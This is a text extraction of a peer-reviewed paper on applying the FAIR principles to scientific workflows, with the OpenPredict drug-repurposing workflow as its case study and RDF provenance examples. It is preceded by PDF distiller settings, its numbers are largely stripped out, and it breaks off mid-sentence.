/transferfunctioninfo /apply /ucrandbginfo /preserve /useprologue false /colorsettingsfile () /alwaysembed [ true ] /neverembed [ true ] /antialiascolorimages false /cropcolorimages true /colorimageminresolution /colorimageminresolutionpolicy /ok /downsamplecolorimages true /colorimagedownsampletype /bicubic /colorimageresolution /colorimagedepth - /colorimagemindownsampledepth /colorimagedownsamplethreshold . /encodecolorimages true /colorimagefilter /dctencode /autofiltercolorimages true /colorimageautofilterstrategy /jpeg /coloracsimagedict << /qfactor . /hsamples [ ] /vsamples [ ] >> /colorimagedict << /qfactor . /hsamples [ ] /vsamples [ ] >> /jpeg coloracsimagedict << /tilewidth /tileheight /quality >> /jpeg colorimagedict << /tilewidth /tileheight /quality >> /antialiasgrayimages false /cropgrayimages true /grayimageminresolution /grayimageminresolutionpolicy /ok /downsamplegrayimages true /grayimagedownsampletype /bicubic /grayimageresolution /grayimagedepth - /grayimagemindownsampledepth /grayimagedownsamplethreshold . /encodegrayimages true /grayimagefilter /dctencode /autofiltergrayimages true /grayimageautofilterstrategy /jpeg /grayacsimagedict << /qfactor . /hsamples [ ] /vsamples [ ] >> /grayimagedict << /qfactor . /hsamples [ ] /vsamples [ ] >> /jpeg grayacsimagedict << /tilewidth /tileheight /quality >> /jpeg grayimagedict << /tilewidth /tileheight /quality >> /antialiasmonoimages false /cropmonoimages true /monoimageminresolution /monoimageminresolutionpolicy /ok /downsamplemonoimages true /monoimagedownsampletype /bicubic /monoimageresolution /monoimagedepth - /monoimagedownsamplethreshold . /encodemonoimages true /monoimagefilter /ccittfaxencode /monoimagedict << /k - >> /allowpsxobjects false /checkcompliance [ /none ] /pdfx acheck false /pdfx check false /pdfxcompliantpdfonly false /pdfxnotrimboxerror true /pdfxtrimboxtomediaboxoffset [ . . . . ] /pdfxsetbleedboxtomediabox true /pdfxbleedboxtotrimboxoffset [ . . . . ] /pdfxoutputintentprofile () /pdfxoutputconditionidentifier () /pdfxoutputcondition () /pdfxregistryname () /pdfxtrapped /false /createjdffile false /description << /chs <feff f f fd e b bbe b a b efa ef a fc c a c f f fdb c ad d cf a ef ee f f f c f e ee ca f ad c f b efa > /cht <feff f f e b a d f e efa acb f ef ef c a f c f f e a f ad c cea c a ef ee f f f c f e ee ca f ad c f b f df efa acb ef > /dan <feff e c c e e c f f d f b d e c b c b e e c c b f b c e e e e f d f b d e b e e e f c c f e f e e> /deu <feff e e e c c e e a d c c e f e f d f b d e e c f e e e f b b f d b e e f f d e e a e d f e e c c d f b d e b f e e e d f e f e f f f e e e> /esp <feff c f e f e f d e f f f e d f e c e d f f f d e f f e e e f d e f f f e f c f e f e f f e> /fra <feff c a f f e e e f d e f f e d f e c e d d e e c f d e e e e ea f e f c e f e f e c e e> /ita <feff c a a d f a f e f d e f e d c e d e f f b f e f d e f f e f f e f f e f e e> /jpn <feff ad c cea fa b f f e f c b f f e e b cea b fdd c d e c b af c c d d ea f bf e e f f d eb fc d b e e a d b a f c c f d a a eb f f a f e ee d b f c d e > /kor <feffc c c c c acc a d c ec b c a d cd d d b b d bc f ad c ae c d c c ace d c c b c c c c d f bb c cb c c c d b c b e e c b ac c c c b c bb c cb f bc f f e c c c c d c c c f c c c b b c b e e> /nld (gebruik deze instellingen om adobe pdf-documenten te maken voor kwaliteitsafdrukken op desktopprinters en proofers. de gemaakte pdf-documenten kunnen worden geopend met acrobat en adobe reader . en hoger.) /nor <feff b e e c c e e c e f f d f b d e f b f b c e f b c c f f e d f b d e e b e e e f c c f e c c e e> /ptb <feff c a f e e f f d f d e f f d f c d d f b f f f f e f f d e f f f d f f d f f f f e f f f e> /suo <feff b e e e e e b c b e c f f d f b d e a c b f f e c f a f e e c f d f b d e f e f c c a f e a c c a d d c c e> /sve <feff e e e e e e c c e e e f d c c b f d f b d e f b c b e e c b f f b f b e b d f b d e b e f e f f f e f e e> /enu (use these settings to create adobe pdf documents for quality printing on desktop printers and proofers. created pdf documents can be opened with acrobat and adobe reader . and later.) >> /namespace [ (adobe) (common) ( . ) ] /othernamespaces [ << /asreaderspreads false /cropimagestoframes true /errorcontrol /warnandcontinue /flattenerignorespreadoverrides false /includeguidesgrids false /includenonprinting false /includeslug false /namespace [ (adobe) (indesign) ( . ) ] /omitplacedbitmaps false /omitplacedeps false /omitplacedpdf false /simulateoverprint /legacy >> << /addbleedmarks false /addcolorbars false /addcropmarks false /addpageinfo false /addregmarks false /convertcolors /noconversion /destinationprofilename () /destinationprofileselector /na /downsample bitimages true /flattenerpreset << /presetselector /mediumresolution >> /formelements false /generatestructure true /includebookmarks false /includehyperlinks false /includeinteractive false /includelayers false /includeprofiles true /multimediahandling /useobjectsettings /namespace [ (adobe) (creativesuite) ( . ) ] /pdfxoutputintentprofileselector /na /preserveediting true /untaggedcmykhandling /leaveuntagged /untaggedrgbhandling /leaveuntagged /usedocumentbleed false >> ] >> setdistillerparams << /hwresolution [ ] /pagesize [ . . ] >> setpagedevice submitted november accepted june published september corresponding authors remzi celebi, remzi.celebi@maastrichtuniversity.nl joao rebelo moreira, j.luizrebelomoreira@utwente.nl academic editor silvio peroni additional information and declarations can be found on page doi . /peerj-cs. copyright celebi et al. distributed under creative commons cc-by . open access towards fair protocols and workflows: the openpredict use case remzi celebi ,*, joao rebelo moreira ,*, ahmed a. hassan , sandeep ayyar , lars ridder , tobias kuhn and michel dumontier institute of data science, maastricht university, maastricht, netherlands computer science, vu university amsterdam, amsterdam, netherlands pharmacology & personalised medicine, maastricht university, maastricht, netherlands medical informatics, stanford university, palo alto, ca, united states of america netherlands escience center, amsterdam, netherlands * these authors contributed equally to this work. abstract it is essential for the advancement of science that researchers share, reuse and reproduce each other’s workflows and protocols. the fair principles are a set of guidelines that aim to maximize the value and usefulness of research data, and emphasize the importance of making digital objects findable and reusable by others. the question of how to apply these principles not just to data but also to the workflows and protocols that consume and produce them is still under debate and poses a number of challenges. in this paper we describe a two-fold approach of simultaneously applying the fair principles to scientific workflows as well as the involved data. we apply and evaluate our approach on the case of the predict workflow, a highly cited drug repurposing workflow. this includes fairification of the involved datasets, as well as applying semantic technologies to represent and store data about the detailed versions of the general protocol, of the concrete workflow instructions, and of their execution traces. we propose a semantic model to address these specific requirements and was evaluated by answering competency questions. this semantic model consists of classes and relations from a number of existing ontologies, including workflow ever, prov, edam, and bpmn. this allowed us then to formulate and answer new kinds of competency questions. our evaluation shows the high degree to which our fairified openpredict workflow now adheres to the fair principles and the practicality and usefulness of being able to answer our new competency questions. subjects bioinformatics, data science, world wide web and web science, software engineering keywords ontology-driven healthcare, fair workflows, drug repurposing, scientific workflows and protocols, reproducibility, semantic web, research object, fair data principles introduction reproducible results are one of the main goals of science. a recent survey, however, showed that more than % of researchers have been unsuccessful in reproducing another research experiment and more than % failed to reproduce their own research studies (baker, ). the rate of non-reproducibility for pharmacological studies is particularly worrying. together with their high costs and their high rate of failure (around %), this highlights how to cite this article celebi r, rebelo moreira j, hassan aa, ayyar s, ridder l, kuhn t, dumontier m. . towards fair protocols and workflows: the openpredict use case. peerj comput. sci. :e http://doi.org/ . /peerj-cs. https://peerj.com/computer-science mailto:remzi.celebi@maastrichtuniversity.nl mailto:j.luizrebelomoreira@utwente.nl https://peerj.com/academic-boards/editors/ https://peerj.com/academic-boards/editors/ http://dx.doi.org/ . /peerj-cs. http://creativecommons.org/licenses/by/ . / http://creativecommons.org/licenses/by/ . / http://doi.org/ . /peerj-cs. the need for new approaches in drug discovery (scannell et al., ). for these reasons, we chose pharmacology as the field to apply and test the approach we will introduce below. specifically, we will be looking into drug repositioning, where small molecules approved for one indication are repurposed for a new indication. drug repositioning is gaining recognition as a safe, effective and lower-cost approach to uncover new drug uses (ashburn & thor, ; sleigh & barton, ). the availability of public data, both in the form of literature curated knowledge and omics data has created exciting opportunities for computational drug repositioning. for instance, gene expression data in repositories such as the gene expression omnibus (geo) enable the analysis of correlations between drug and gene expression - termed the connectivity map approach - to find chemicals that may counter cellular disorders (barrett & edgar, ), including alzheimer’s, and small cell lung cancer (lamb et al., ; sirota et al., ). more sophisticated approaches use network analysis and machine learning to efficiently combine drug and disease data (cheng et al., ; gottlieb et al., ; hoehndorf et al., ; wu et al., ; bisgin et al., ). the ability to reproduce original research results is contingent on the availability of the original data, methods and results. the fair principles (wilkinson et al., ), describe a set of requirements for data management and stewardship to make research data findable, accessible, interoperable, and reusable. ongoing efforts on fair cover data policies, data management plans, identifier mechanisms, standards and data repositories (collins et al., ). highly diverse communities, from the biomedical sciences to the social sciences and humanities, are now working towards defining standards for publication and sharing of data. in anticipation, new methods and infrastructure are needed to facilitate the generation of fair data and workflows. here, we describe a methodology to publish scientific workflows as fair data. we are using the term workflow here to include computational steps implemented in software but also manual steps, such as manual data cleaning steps or wet-lab activities. we evaluate our method by applying it to the predict drug repositioning workflow. based on this example, we will try to answer our research question of how we can use existing vocabularies and techniques to make scientific workflows more open and fair, with a particular focus on the interoperability aspect. the main contributions of this paper are (a) general guidelines to make scientific workflows open and fair, focusing on the interoperability aspect, (b) the openpredict use case, demonstrating the open and fair version of the predict workflow, (c) new competency questions for previously unaddressed reproducibility requirements, and (d) evaluation results on the practicality and usefulness of our approach. background below, we refer to the most relevant background with respect to reproducibility, workflow systems, and applying fair to workflows. scientific workflows and reproducibility according to the descriptive ontology for linguistic and cognitive engineering (dolce) (borgo & masolo, ), a workflow is a ’’plan that defines role(s), task(s), and a celebi et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. specific structure for tasks to be executed, usually supporting the work of an organization’’, and a plan is a description of instructions with an explicit goal. a scientific workflow, therefore, is such a plan that implements scientific methods to work towards the general goal of scientific knowledge gathering and organization. certain scientific workflows can be automated through workflow systems, which are software systems that enable the representation and execution of structured tasks. the lack of relevant details in the published descriptions of scientific workflows (vasilevsky et al., ) is an important factor contributing to the non-reproducibility rates of % in pharmacology (ioannidis, a; prinz, schlange & asadullah, ), % in cancer research (begley & ellis, ), and % in psychology (klein et al., ). a recent analysis of over . million jupyter notebooks (available in github) found that only . % of the notebooks could be executed without errors and only . % produced the same results (pimentel et al., ). as a consequence, it has been reported that data scientists spend % of their time finding, understanding and accessing datasets, and % of their time cleaning and organizing these datasets to use in their studies (crowdflower, ). thus, only % of the time is left for data scientists to spend on their core activities, such as mining data, refining algorithms, building training sets and analyzing the results. workflow systems to tackle the workflow decay phenomenon (hettne et al., ), a number of recent initiatives are targeting the improvement of the reproducibility of computational workflows for example the common workflow language (cwl) (https://www.commonwl.org/) and the workflow description language (wdl) (https://openwdl.org/), which have become the de facto standard for syntactic interoperability of workflow management systems. cwl and wdl are aimed to exchange and run computational workflows reproducibly in different environments. they are designed to separate the workflow description from its execution. in order to improve semantic interoperability and connect workflows to real-world entities in a systematic way, additions of semantic models and methods have been proposed, for example the workflow ever project with its research objects method (belhajjame et al., ). provenance is an important aspect of workflows, which can be classified into prospective provenance, retrospective provenance, and workflow evolution provenance. prospective provenance refers to the specifications or ‘‘recipes’’ that describe the workflow steps and their execution order, typically as an abstract representation of these steps (protocols), as well as expected inputs and outputs (cohen-boulakia et al., ). retrospective provenance refers to the information about actual workflow executions that happened in the past, including the concrete activities that consumed inputs and produced outputs, as well as information about the execution environment (khan et al., ). workflow evolution provenance refers to tracking the versions of workflow specifications and the respective data, as the workflow specification is changed and improved over time. a number of models and methods have been developed to capture these different kinds of provenance. the prov ontology (lebo et al., ) provides the vocabulary and model for provenance in general, which can be used in conjunction with top-level ontologies such celebi et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com https://www.commonwl.org/ https://openwdl.org/ http://dx.doi.org/ . /peerj-cs. as dolce (borgo & masolo, ) and other general vocabularies such as dublin core and schema.org. several approaches have been proposed to apply prov to workflows, such as the open provenance model for workflows (opmw) (moreau et al., ), p-plan (garijo & gil, ), and cwlprov (soiland-reyes et al., ). other notable examples include provbook and the reproduce-me ontology (samuel & könig-ries, a; samuel & könig-ries, b) for workflows in jupyter notebooks, the ml-schema ontology for machine learning workflows (correa publio et al., ), the publishing workflow ontology (pwo) for workflows in scientific publications (hartanto, sarno & ariyani, ), and the business process modelling notation (bpmn) to specify business processes (rospocher, ghidini & serafini, ). other approaches, such as smart protocols (giraldo et al., ) and protocols.io, target the description of laboratory protocols. applying fair to workflows the fair principles have received significant attention, but we currently lack overarching approaches to align them with scientific protocols and workflows in a broad sense. making a workflow fair-compliant entails that general-purpose software can interpret it and understand its context. the application of fair in healthcare, for example, has shown that these principles boost data-driven applications that require the integration of data coming from different sources, achieving ‘‘interoperability without the need to all speak exactly the same language’’ (imming et al., ). recent initiatives have outlined how fair can be applied to software (neil & daniel, ; lamprecht et al., ), contributing towards the goal of applying fair not just to input and output data, but to the entire process in between, in order to solve the current problem that even human experts are often unable to reconstruct the specific steps and parameters of a workflow from what is published in scientific articles (vasilevsky et al., ). the fairification jacobsen et al. ( ) consists of a number of steps required to transform an existing data element to its fair version, typically leveraging the rdf technology for the interoperability aspect. rdf is a broadly applicable formal language to achieve the semantic interoperability principle i . fairification starts by retrieving the non-fair data from its sources. subsequently these datasets are analyzed to understand the data structures and how they are mapped to concepts from the domain. the next step, semantic modelling, is a major activity comprising semantic harmonisation and integration, requiring the reuse and/or creation of models compliant with the fair principles. once the dataset is aligned with semantic definitions, it can be expressed in rdf and augmented with metadata. the last step is to store the fairified data into a findable and accessible manner. the fair workflows approach in this section we describe our workflow representation requirements, with a special focus on the coverage of manual steps, different workflow abstraction levels, and versioning on all these levels. we formulate these requirements as competency questions and present a celebi et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. configuration of elements from existing semantic models as a unified model to answer these competency questions. requirements and competency questions with the help of structured interviews with data scientists and a gap analysis of the literature, we formulated user requirements for the reproducibility of workflows (the details of the interviews are given in appendix s ). the interviewees stated that they experience many challenges in reproducing their or others’ work, due to the lack of details of workflow steps, data cleaning and filtering. also essential information, such as processing parameters or design details needed to reproduce the results, is often missing. some of these requirements are already covered by existing approaches while others have not been addressed so far. the interviews indicated that the definitions of manual processes of workflows are usually missing or incomplete, which is a requirement poorly addressed by computational workflow approaches. often, software libraries, packages and versions of tools used are not explicitly recorded. the interviewees suggested making metadata of the datasets accessible, add richer prospective and retrospective provenance and allowing for fine-grained workflow versioning linked to outputs produced during distinct executions. a unanimous recommendation was to allow for the separate input of relevant workflow parameters, so that one can run the same workflow multiple times with different processing options without having to change the workflow itself. the representation of software environment details (e.g., the used libraries and packages) is already addressed by some of the surveyed semantic models, like workflow ever, cwlprov and reproduce-me. we checked the capabilities of the existing semantic approaches to address the needs collected from the interviews. we concluded that none of the related work could completely address all the requirements together. the missing parts can be put in three main categories: (cq ) manual steps description and executions; (cq ) abstraction levels of workflows; and (cq ) versioning of executed workflows. therefore, we propose the following additional sets of competency questions (cq) to cover these missing parts: the first group of questions (cq ) is about manual steps: cq . which steps are meant to be executed manually and which to be executed computationally? cq . for the manual steps, who are the agents responsible to execute them (individuals and roles)? cq . which datasets were manually handled and their respective formats? cq . what are the types of manual steps involved? the second group (cq ) is about instantiation of general workflows by more specific ones: cq . what are the main steps of a general workflow? cq . what are the steps of a specific workflow and how are they described? celebi et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. #supp- http://dx.doi.org/ . /peerj-cs. figure unified semantic model for workflows. full-size doi: . /peerjcs. /fig- cq . what higher-level description instantiated a certain workflow step? cq . who or what method made the instantiation of a semantic/meta level description of a step into an executable workflow step? the third group (cq ) are questions about versioning of workflows and their executions: cq . what are the existing versions of a workflow and what are their provenances? cq . which instructions were removed/changed/added from one version to another? cq . which steps were automatized from one version to another? cq . which datasets were removed/changed/added for the different versions? cq . which workflow version was used in each execution and what was generated? to the best of our knowledge, none of the previous research on semantic modelling of workflows (or protocols/processes) addresses all these requirements together. in few cases some semantic models only partially cover some questions, as explained in the prior section. unified model from the study of the diverse existing semantic models for workflows and protocols, we compiled a unified conceptual model covering the elements required to answer our competency questions. for this, we applied the ontology-driven conceptual modelling approach (guizzardi et al., ), which is based on the unified foundational ontology (ufo) and its ontological language ontouml (moreira et al., ). figure illustrates the main elements of our unified model (https://w id.org/fair/plex), which is primarily based on dolce ultra lite (dul), prov, p-plan and bpmn . . celebi et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com https://doi.org/ . /peerjcs. /fig- https://w id.org/fair/plex http://dx.doi.org/ . /peerj-cs. the most relevant ontology used is p-plan, which provides an abstract terminology of the main building blocks to describe plans. the p-plan:plan category is the core element of our unified model and is the class used to classify any type of instruction. it allows for the composition of instruction by means of smaller steps (p-plan:step) that have input and output variables (p-plan:variable). with the pwo:hasfirststep property, we can indicate the first step of a plan, and with dul:precedes, we can indicate whenever a step precedes another, thereby enabling the representation of sequential and parallel steps. we decouple a particular step within a workflow from its instruction with the pattern p-plan:step dul:isdescribedby p-plan:plan, where each step always points to one plan. this approach allows us to separate the workflow steps, enabling the reuse of instructions by different workflows. therefore, in our approach a step is a lightweight object (like a pointer) that serves only for ordering of instructions without coupling them to the specific workflow. besides that, we use the dul:isdescribedby property as a self-relationship of p-plan:plan, to represent that an instruction describes another instruction in a different abstraction level. with this approach, we can represent anything from high-level abstract protocols to concrete and executable workflow steps, and the links between these levels. this can be used to first represent the general protocol and then move to the definition of the executable steps akin to the common software engineering phases of specification and implementation. our model can however also be used in the other direction to extract a new common protocol from similar existing concrete workflows. at the more abstract levels, instructions are written in a natural language like english (or possibly pseudo-code), whereas at the lowest level, we find the executable specifications, which can be written in a programming language and thereby automatically executable. alternatively, at the lowest level instructions can be in natural language, such as for wet-lab instructions, which can naturally only be executed in a manual fashion. for example, the first general step of a specification of a machine learning pipeline like openpredict (to which we will come back to shortly) might be to ‘‘load all features and gold standard’’ (a p-plan:plan). the concrete execution of this general step is described by four concrete and executable steps (written in a language such as python), each having a link (dul:isdescribedby) to the general description of the step. we use the bpmn . ontology for the representation of manual and computational activities with bpmn:manualtask and bpmn:scripttask, which we both define as subclasses of p-plan:step. with this approach, the modeller can therefore include manual and automated steps in the same workflow. more specific classes can be used for particular workflow systems, such as reprod:cell as a kind of bpmn:scripttask describing a code cell in a jupyter notebook. we follow the fair data point specification (https://github.com/fairdatateam/ fairdatapoint-spec) for the representation of datasets (input and output) through the dcat:dataset element, which should be linked to the available distributions (dcat:distribution) through the dcat:distribution property, and the url to download the distribution is represented with dcat:downloadurl. we improved this approach with data formats from the edam ontology through the dcat:mediatype property. we use celebi et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com https://github.com/fairdatateam/fairdatapoint-spec https://github.com/fairdatateam/fairdatapoint-spec http://dx.doi.org/ . /peerj-cs. prov:qualifiedusage for variable bindings. for example, the instruction (p-plan:plan) to ‘‘download a dataset and save it in the local environment’’ has a link (prov:qualifiedusage) to the ‘‘binding the online dataset to a local variable’’ (prov:usage), which represents the connection between the dataset distribution (dcat:distribution) and the local variable (p-plan:variable) through instances of the prov:entity properties. for the representation of retrospective provenance, i.e., information about prior executions of a workflow, we follow the p-plan approach by using p-plan:activity and linking it to the steps with p-plan:correspondstostep. to represent the roles of the different involved agents (such as people and software), we use the agent associations as defined in prov. for example, the jupyter notebook (prov:softwareagent) was used as execution environment (prov:role) for all computational steps of the openpredict workflow. furthermore, as a practical design decision, we extended the notion of prov:association for endurants, so the modeller can apply the association pattern similarly to the perdurant way, i.e., use the property prov:hadplan from p-plan:association to p-plan:plan instead of the relation from prov:activity through prov:qualifiedassociation. therefore, this approach allows the modeller to represent the association of agent roles to an instruction. for example, remzi is the openpredict main developer, so the ‘‘remzi as developer of openpredict’’ (prov:association) links to (a) the ‘‘developer’’ (prov:role) through prov:hadrole property, (b) the remzi object (a prov:agent) through prov:agent; and (c) all opepredict instructions (p-plan:plan), through prov:hadplan. notice that, although the terminology of these properties targeted the perdurant aspect (prov:activity), these properties are also useful for the endurant aspect. ideally, they should have the adequate endurant terminology, so instead of prov:hadplan, it should be ‘‘prov:hasplan’’ (similarly for prov:hadrole too). one of the most important links is the one between a workflow execution and its created outputs. for this, we specialized the prov approach by using prov:generated to link a workflow activity (p-plan:activity) to an output artefacts (opmw:workflowexecutionartifact). therefore, each step execution can generate workflow execution artifacts. to represent the specifics of machine learning workflows, we moreover use the ml-schema ontology (mls), such as to specify the trained model and its evaluation measures (via mls:modelevaluation and mls:evaluationmeasure). for example, it can be used to specify the accuracy of the models that were trained during different executions. for the representation of versioning, finally, we use dc:hasversion to assign version identifiers and prov:wasrevisionof to link to the previous versions, and apply this to all relevant elements, including workflows, instructions, software, and datasets. case study topic we evaluate our approach below with a case study of a computational drug repurposing method based on machine learning, called predict (gottlieb et al., ). predict is one of the most frequently cited drug repurposing methods and provides a ranking of drug-disease associations on the basis of their similarity to a set of known associations. celebi et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. predict has reported a high auc ( . ) for predicting drug indications, though neither the original data nor the software to produce the results are available. the features for the drug prediction classifier included five drug–drug similarity measures and two disease–disease similarity measures. the similarities between drugs were calculated based on molecular fingerprints, common side effects of drugs, target protein sequence alignment, semantic similarity of target genes of drugs in the gene ontology, and closeness of target proteins in human protein–protein interaction network. for the disease aspect, two disease–disease similarities were calculated based on medical description of diseases and semantic similarity of disease terms in the human phenotype ontology. the method transforms drug–drug and disease–disease similarities into integrated features to be used for a logistic regression training. for evaluating the performance of the logistic regression, -fold cross-validation was used in two different ways: one in which % of drugs are hidden and one in which % of associations are hidden. in the first strategy, % randomly selected drugs in the gold standard and the known indications associated with them were removed. the positive training set consisted of the remaining % of drugs and the indications associated with them. the negative training set consisted of randomly generated drug-disease associations which were not in the positive set. for the second strategy, the known associations were divided into % positive training and % positive test sets, while negative training and test sets were built using randomly generated drug-disease associations from respective sets. in the next section, we report on the application of our approach to this use case. openpredict case study as case study, we took the original predict workflow, as introduced above, and transformed it with our approach to make it open and fair. we therefore call the resulting workflow openpredict. it implements the same steps of the original predict, i.e., five drug–drug similarity and two disease–disease similarity measures were used to train a logistic regression classifier to predict potential drug-disease association (see fig. ). therefore, we follow the same general protocol of these four steps: . data preparation: in this step, the necessary dataset is collected and preprocessed. . feature generation: in this step, we generate features from the collected data sets. drug-drug and disease-disease similarity scores were combined by computing the weighted geometric mean. thus, we combine five drug-drug similarity measures and two disease-disease similarity measures, resulting in features. . model training: in this step, the generated features from the previous step are to be used to train in a simple logistic classifier. . model evaluation: this step uses two different cross-validation approaches: one where % of drugs is hidden and one where % of associations is hidden for testing. roc auc, aupr, accuracy, precision and f-score of the classifier on test data are reported. below we explain how we made a fair version of predict’s input data and then show how we used our approach to model the openpredict workflow that is consuming this celebi et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. figure openpredict workflow (version . ) with manual and computational steps. full-size doi: . /peerjcs. /fig- data. the implementation and the workflow description of openpredict are available on github (https://github.com/fair-workflows/openpredict). fairified data collection since the original data used in predict is not publicly available, we collected data from open sources and made it fair with linked data (bizer, heath & berners-lee, ) representations. we obtained data about drugs, drug targets, drug chemical structure, and drug target sequence from drugbank (wishart et al., ), and additional drug targets from the kegg dataset (kanehisa et al., ). the sider dataset (kuhn et al., ) was used for drug side effects and the hgnc and the goa datasets (gray et al., ; barrell et al., ) were used for gene identifier mapping and gene ontology (go) annotation respectively. we used linked data versions of the above-mentioned datasets from bio rdf (callahan, cruz-toledo & dumontier, ), which is an influential resource for the biomedical sciences, providing a network of data collected from several major biological databases. on to of that, we used the supplementary file provided by menche et al. ( ) for protein–protein interactions and disease phenotype annotations that link hpo terms to omim diseases (https://hpo.jax.org/app/download/annotation). mesh annotations were collected from (caniza, romero & paccanaro, ) (https: //paccanarolab.org/disease_similarity) and annotations were also obtained by ncbo annotator api (noy et al., ) using the omim disease description. the data that was not yet in a linked data format were converted to rdf with a fairification process (jacobsen et al., ). we kept the copies of the retrieved non-rdf datasets in our github repository to prevent the data access issues that may arise if data sources are unavailable. we also stored the collected datasets in a triplestore and created celebi et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com https://doi.org/ . /peerjcs. /fig- https://github.com/fair-workflows/openpredict https://hpo.jax.org/app/download/annotation https://paccanarolab.org/disease_similarity https://paccanarolab.org/disease_similarity http://dx.doi.org/ . /peerj-cs. table all datasets used in openpredict version v . and v . . dataset file date retrieved data format download url bio rdf r datasets (drugbank, kegg, hgnc, sider and goa) - - .nq (rdf) com- pressed as .gz https://download.bio rdf.org/#/release/ / predict drug in- dication gold stan- dard - - .tab with tabular separator https://www.ncbi.nlm.nih.gov/pmc/articles/pmc / bin/msb -s .xls pubchem-drugbank mappings - - .tab with tabular separator https://raw.githubusercontent.com/dhimmel/drugbank/gh- pages/data/mapping/pubchem.tsv protein-protein in- teractions - - .txt with tabular sep- arator https://science.sciencemag.org/highwire/filestream/ / field_highwire_adjunct_files/ /datasets_s -s .zip hpo phenotype an- notations - - .tab with tabular separator http://compbio.charite.de/jenkins/job/hpo.annotations/ lastsuccessfulbuild/artifact/misc/phenotype_annotation.tab †mesh phenotype annotations - - .tab with tabular separator http://www.paccanarolab.org/static_content/disease_ similarity/mim mesh.tsv mesh phenotype annotations (bio- portal) - - .txt file https://raw.githubusercontent.com/fair- workflows/openpredict/master/data/external/ meshannotationsfrombioporttalusingomimdesc.txt sparql queries to access the triplestore in order to produce the features for predict’s method. our openpredict workflow has two versions ( . and . ). in the first, we experimented with the fairifier tool with the two inputs that are provided as text files, i.e., (protein–protein interactions in human interactome) and (disease phenotypic descriptions). besides the formalization of the manual steps through our approach, we also provide guidelines for the manual steps. in the second, we wrote python scripts for fairificiation process of these datasets, evolving most of the manual steps to computational ones. table summarizes the list of all datasets used in version v . and v . . openpredict v . also uses a different mesh annotation dataset for disease similarity (indicated with † in table ) for this fairification process, the data needs to be mapped to formal semantic models. in our case, important concepts included ‘‘protein-protein interaction’’ from bioportal, ‘‘protein interactions’’ from edam (edam:topic_ ), the bio rdf properties bio rdf:interactor_a and bio rdf:interactor_b for the gene interactors representing the role of a gene in a protein–protein interaction, and ‘‘disease’’ and ‘‘has phenotype’’ from sio (sio_ and sio_ ). openpredict workflow representation figure illustrates the main steps of the openpredict workflow, in which the main protocol is represented as a dul:workflow and a p-plan:plan, with version set through the dc:hasversion property. the workflow consists of four steps: data preparation, feature generation, model training and evaluation, and presentation of results. each one is defined celebi et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com https://download.bio rdf.org/#/release/ / https://www.ncbi.nlm.nih.gov/pmc/articles/pmc /bin/msb -s .xls https://www.ncbi.nlm.nih.gov/pmc/articles/pmc /bin/msb -s .xls https://raw.githubusercontent.com/dhimmel/drugbank/gh-pages/data/mapping/pubchem.tsv https://raw.githubusercontent.com/dhimmel/drugbank/gh-pages/data/mapping/pubchem.tsv https://science.sciencemag.org/highwire/filestream/ /field_highwire_adjunct_files/ /datasets_s -s .zip https://science.sciencemag.org/highwire/filestream/ /field_highwire_adjunct_files/ /datasets_s -s .zip http://compbio.charite.de/jenkins/job/hpo.annotations/lastsuccessfulbuild/artifact/misc/phenotype_annotation.tab http://compbio.charite.de/jenkins/job/hpo.annotations/lastsuccessfulbuild/artifact/misc/phenotype_annotation.tab http://www.paccanarolab.org/static_content/disease_similarity/mim mesh.tsv http://www.paccanarolab.org/static_content/disease_similarity/mim mesh.tsv https://raw.githubusercontent.com/fair-workflows/openpredict/master/data/external/meshannotationsfrombioporttalusingomimdesc.txt https://raw.githubusercontent.com/fair-workflows/openpredict/master/data/external/meshannotationsfrombioporttalusingomimdesc.txt https://raw.githubusercontent.com/fair-workflows/openpredict/master/data/external/meshannotationsfrombioporttalusingomimdesc.txt http://dx.doi.org/ . /peerj-cs. by (dul:isdescribedby) its own p-plan:plan. in the first version of openpredict ( . ) all steps within the data preparation were manual (bpmn:manualtask), as the fairification process and the preparation steps on data that were already provided as rdf. the second version of openpredict ( . ) automated most of these manual steps, requiring less human intervention. we will now go through some of the most important aspects of this representation. prospective provenance we decoupled the workflow steps from the instructions, linking a p-plan:step to a p- plan:variable through p-plan:hasinputvar and p-plan:hasoutputvar, while the p-plan:plan links to the prov:usage through the prov:qualifiedusage property, describing how to bind the variable to other resources. this is an example: opredict:step_download_drugbank_dataset rdf:type bpmn:manualtask ; rdf:type edam:operation_ ; rdf:type p-plan:step ; p-plan:hasoutputvar opredict:variable_drugbank_dataset_online ; p-plan:isstepofplan opredict:plan_main_protocol_v ; dul:isdescribedby opredict:plan_download_drugbank_dataset ; dul:precedes opredict:step_save_drugbank_dataset ; rdfs:label "download drugbank dataset" ; . opredict:plan_download_drugbank_dataset rdf:type p-plan:plan ; dc:description "download drugbank dataset" ; dc:language :linguisticsystem_xsd_language_english ; rdfs:label "download drugbank dataset" ; prov:qualifiedusage opredict: usage_fetch_download_drugbank_dataset_to_variable ; . opredict:usage_fetch_download_drugbank_dataset_to_variable rdf:type prov:usage ; rdfs:label "link variable to download drugbank dataset" ; prov:entity opredict:distribution_release - -drugbank -drugbank.nq.gz; prov:entity opredict:variable_drugbank_dataset_online ; . opredict:distribution_release - -drugbank -drugbank.nq.gz rdf:type dcat:distribution ; rdfs:label "release / / drugbank/drugbank.nq.gz" ; dcat:downloadurl "http :// download.bio rdf.org/files/release / / drugbank/ drugbank.nq.gz" ; dcat:mediatype opredict:dataformat_nq_compressed_gz ; . opredict:variable_drugbank_dataset_online rdf:type p-plan:variable ; rdfs:label "drugbank dataset online" ; . retrospective provenance we represent the concrete executions that happened and the concrete output that was generated with a p-plan:activity that is linked to a p-plan:step through the p- plan:correspondstostep property and to the outputs (opmw:workflowexecutionartifact) through prov:generated. each output has a value (e.g., accuracy rate) and is linked to celebi et al. ( ), 